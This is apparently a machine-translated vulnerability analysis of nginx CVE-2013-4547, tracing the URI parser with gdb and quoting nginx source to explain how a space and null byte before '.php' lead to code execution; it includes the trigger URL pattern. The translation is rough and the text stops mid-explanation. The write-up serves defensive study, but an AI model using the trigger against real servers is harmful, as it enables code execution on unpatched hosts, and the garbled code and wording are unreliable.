Nginx historically there have been many times parsing vulnerability, such as 80sec found parsing vulnerability, as well as the extension directly after add%0 0 truncation lead to code execution resolves vulnerabilities.
But in 2 0 1 3 year-end, nginx again broke Vulnerability, CVE-2 0 1 3-4 5 4 7 this vulnerability can lead to a directory across and code execution, which affected version: nginx 0.8.41 – 1.5.6, the range is wide.
For more in-depth understanding of the vulnerability generated by the reason, the author according to the official patch of<http://nginx.org/download/patch.2013.space.txt> for this vulnerability for further analysis,
Whereby the positioning of this vulnerability requires analysis of the point, enable gdb debugging, the break point is set to ngx_http_parse_request_line, the
And watch variable state and p, because this function is a state machine, the state for the state value, p is a pointer to the specified text log, it will be the vulnerability to trigger a key point.
The commissioning process need to keep track of nginx worker sub-processes, so the need to set setfollow-fork-mode child, and in the appropriate place to set a breakpoint,
Figure-1 Follow-up sub-process
http://127.0.0.1/a.jpg non-coding spaces\0.php
Use normal sentence has the s-or n-track, will find in the url of the parsing process, when a path exists’.’ Or url the presence of’\0’will have the following treatment:
case sw_check_uri: ...... case '.': r->complex_uri = 1; //This as a flag determines the use of ngx_http_parse_complex_uri method, path repair state = sw_uri; break; casesw_check_uri: ...... case '\0': //when it encounters the\0 that will be determined to be illegal characters return NGX_HTTP_PARSE_INVALID_REQUEST;
But in checking the uri with spaces is entered into sw_check_uri_http_09 logic, then when we send the attack code, The execution flow will be as follows:
Figure-2 \0 does not trigger an exception
Then back to the sw_check_uri state, 此时后面的字符串为.php and“.” Will be to is the uri of the extension of the separator